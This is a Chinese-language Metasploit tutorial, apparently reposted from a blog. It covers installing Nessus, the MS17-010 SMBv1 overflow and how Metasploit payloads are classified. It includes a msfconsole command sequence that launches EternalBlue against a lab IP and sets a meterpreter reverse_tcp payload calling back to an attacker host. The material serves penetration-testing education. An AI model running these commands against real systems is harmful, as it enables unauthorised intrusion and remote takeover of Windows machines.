5.Metasploit攻击载荷深入理解
Metasploit 进阶第三讲
深入理解攻击载荷
01 Nesus介绍、安装及使用
Nessus介绍
Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库。
采用B/S模式,服务器端负责执行具体的扫描任务,客户端负责管理配置服务器端,在服务器端还采用plug-in体系,支持客户端加入自定义插件,其运作效能随系统资源而自行调整。
Nessus安装&使用
1.https://www.tenable.com/downloads/nessus ->Nessus下载、获取激活码
2.dpkg -I Nessus-8.3.1-debian6_amd64/i386.deb ->Nessus安装
3./etc/init.d/nessusd start ->Nessus服务器端启动
Register for an Activation Co
4.https://127.0.0.1:8834/ ->客户端访问(添加例外)获取激活码:
https://www.tenable.com/products/nessus-home
实操:利用ms2017-010攻击目标主机
ms17-010漏洞出现在Windows SMBv1中的内核态函数srv4SrvOs2FeaListToNt。
在将FEA list转换成NTFEA(Windows NT FEA)list前会调用srv.SrvOs2FeaListSizeToNt去计算转换后的FEAlist的大小,因计算大小错误,而导致缓冲区溢出。
Msfconsole
Search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.24.142
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
深入理解payload
payload是什么?
payload字面意思是有效攻击载荷,包含需要在远程主机上运行的恶意代码。
payload和exploit的区别?
exploit是传送系统(运载火箭),payload是用来实际做什么事的代码(弹头)
payload命名规则:
Staged payload:<platform>/[archl/stage>/<stager>
Single payload:<platform>/[arch]/ssingle>
其中arch可选,因为不必要或已默认,如:php/meterpreter/reverse_tcp
payload的分类:
single、stager、stage三种。其中:
single:是一种完全独立的Payload。如:meterpreter_reverse_tcp
stager:负责建立目标用户与攻击者之间的网络连接,将执行传递到另一个阶段。
如:reverse_tcp、bind_tcp
作用:
1.允许我们使用较小的有效载荷去加载具有更多功能的较大的payload。
2.使通信机制与最终阶段分离成为可能。
stage:提供更高级的功能,且没有大小限制(因为stager为stage分配了大量内存)
如:meterpreter
stager和stage就像web入侵里面提到的小马和大马一样,由于exploit环境的限制,可能不能一下子把stage传过去,需要先传一个stager,stager在attacker和target之间建立网络连接,之后再把stage传过去进行下一步的行动。
转载于:https://www.cnblogs.com/lvwuwa/p/11128964.html
5.Metasploit攻击载荷深入理解相关推荐
- 使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
文章目录 前言 一.免杀 1.msfvenom的使用 2.多重编码 二.加壳 1.upx的使用 总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以 ...
- MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)
来源:https://www.cnblogs.com/zlslch/p/6888540.html 不多说,直接上干货! 首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploi ...
- kali初讲——Metasploit攻击ms17_010复现
Metasploit攻击--ms17_010漏洞利用 文章目录 Metasploit攻击--ms17_010漏洞利用 导论 一.ms17_010简介 二.攻击使用模块 三..攻击思路 四.具体实施 总 ...
- Kali渗透测试:使用工具Metasploit攻击操作系统
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...
- Metasploit攻击win7实例(上)
一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...
- Metasploit攻击linux实例
一.实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二.实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali ...
- Metasploit攻击Oracle的环境搭建
Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作.本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5).在默认情况下使用oracle的一些攻击功能会出 ...
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...
不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...
最新文章
- tf.nn.embedding_lookup()的用法
- svpwm矢量控制电机相电压波形_如何深入理解SVPWM?
- 最少预算覆盖最多应用,高性价比小企业服务器服务器榜单
- Linux shell去除字符串中所有空格
- Linux中高斯分布的参数设置,华为openGauss 配置操作系统参数
- java中使用grpc和protobuf
- 物联网框架ServerSuperIO在.NetCore实现跨平台的实践路线
- LeetCode 206. 反转链表
- 同样是创业,同样是两年,有的已经做了几千万,这边已经内斗死了
- 【财务预警】基于matlab BP神经网络财务预警【含Matlab源码 494期】
- VIN码识别技术,扫一扫自动获取车架号
- 刀图案c语言,刀符号图案大全 | 手游网游页游攻略大全
- 网络篇 - netty实现高并发安全聊天客户端
- 【矩阵论】单射、满射与双射
- 彩信发送失败原因是什么?如何解决?
- win10 SystemParametersInfo 设置屏保 不好使_[教程]win10 ,ubuntu双系统安装避坑指南
- 《ERP高级计划》书解读-APS案例分析之四缓冲的计算(蔡颖)(转)
- 第9章第24节:制作商业计划书的盈利模式幻灯片 [PowerPoint精美幻灯片实战教程]
- (十六)从零开始学人工智能-深度学习基础3
- 程序员课外拓展007:强烈推荐一个自学网:可汗学院
热门文章
- Zed Shaw:一位老程序员的建议
- “笨办法”学Python3,Zed A. Shaw, 习题3
- http://blossomsandaccents.com/mk.html 57568
- 美设计出激光动力太空电梯 成功爬升900米
- 打脸质疑者!Mobileye市值冲高,公司CEO说出心声
- 美式英语和英式英语不同发音总结
- 【Proteus仿真】步进电机转速数码管显示
- VMware启动报错Attempting to start up from:EFI VMware Virtual SCSI Hard Drive(0.0)
- 改后缀名不能导致图片格式的转换,以.png后缀名的图片不一定是png图片
- python中迭代对象是什么_python中的迭代对象和迭代器